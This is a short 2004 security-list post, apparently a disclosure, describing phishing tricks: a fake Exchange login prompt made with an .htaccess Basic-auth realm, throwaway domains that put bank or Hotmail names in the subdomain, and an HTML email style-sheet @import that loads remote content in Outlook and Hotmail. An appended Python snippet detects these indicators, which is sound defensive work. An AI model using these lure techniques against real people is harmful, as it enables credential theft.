Phriday, May 21, 2004

Several pheeble yet interesting phishing possibilities arise as phollows:

Take one .htaccess trivially modified to suit the target scenario:

    AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
    AuthType Basic

One throw-away domain which can include the target's host name:

    http://www.hotmail.hackerguy.nickelandimehosting.com
    http://www.evenlargerbank.money.nickelandimehosting.com
    http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

    <STYLE type=text/css>
    @import url( http://www.malware.com/pheesh );
    </STYLE>

1. Outlook Express
   [screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003
   [screen shot: http://www.malware.com/ohlook.png 39KB]

   note: the above 'style sheet' works on outbound [reply to] [so much for not downloading external content] inbound can be achieved as well via http://securityfocus.com/bid/10369 which has an even more convincing network login applet

3. Hotmail
   [screen shot: http://www.malware.com/goturmail.png 91KB]

   hint: hotmail [and other] web designer people; off-set the html login form on the site as many prime banks have done.

The possibilities are obviously endless.

BE AWARE OF THE SHARKS OUT THERE

NB: anyone have any contact or connection to the upper management security or abuse dept. of one public company called: SAVVIS Communications. http://savvis.net/ it appears their abuse dept. is woefully negligent in attending to abuse affairs.

End Call

-- 
http://www.malware.com
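
For mail-gateway or triage use, the two indicators described in the post (a remote style sheet @import in an HTML message, and a target's name used as a host label under an unrelated domain) can be checked mechanically. The following is an added example, not part of the original post; the BRANDS allowlist, the function names and the two-label domain rule are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: brand label -> domains that brand legitimately uses.
# "evenlargerbank.com" is constructed for this example.
BRANDS = {"hotmail": {"hotmail.com"}, "evenlargerbank": {"evenlargerbank.com"}}

STYLE_RE = re.compile(r"<style\b[^>]*>(.*?)</style>", re.I | re.S)
IMPORT_RE = re.compile(r"@import\s+(?:url\(\s*)?['\"]?\s*(https?://[^'\"\s)]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

def registrable(host):
    # Simplification: last two labels. Use the Public Suffix List in production.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def remote_style_imports(html):
    """Remote URLs that <style> blocks @import (fetched when the mail renders)."""
    urls = []
    for block in STYLE_RE.findall(html):
        urls.extend(IMPORT_RE.findall(block))
    return urls

def brand_in_subdomain(url):
    """Return the brand used as a host label under someone else's domain, else None."""
    host = (urlparse(url).hostname or "").rstrip(".")
    for brand, own_domains in BRANDS.items():
        if brand in host.split(".") and registrable(host) not in own_domains:
            return brand
    return None

def scan(html):
    """Collect both indicators for one HTML message body."""
    hits = [(u, brand_in_subdomain(u)) for u in URL_RE.findall(html)]
    return {"remote_css": remote_style_imports(html),
            "lookalike_hosts": [(u, b) for u, b in hits if b]}

# Constructed sample message body, built from the values quoted in the post.
SAMPLE = """<html><head><STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE></head><body>
<a href="http://www.hotmail.hackerguy.nickelandimehosting.com">Sign in</a>
<a href="http://www.hotmail.com/">Help</a>
</body></html>"""

if __name__ == "__main__":
    for kind, items in scan(SAMPLE).items():
        print(kind, items)
```

A hit on remote_css is worth quarantining on its own, since the fetch happens without any click from the reader.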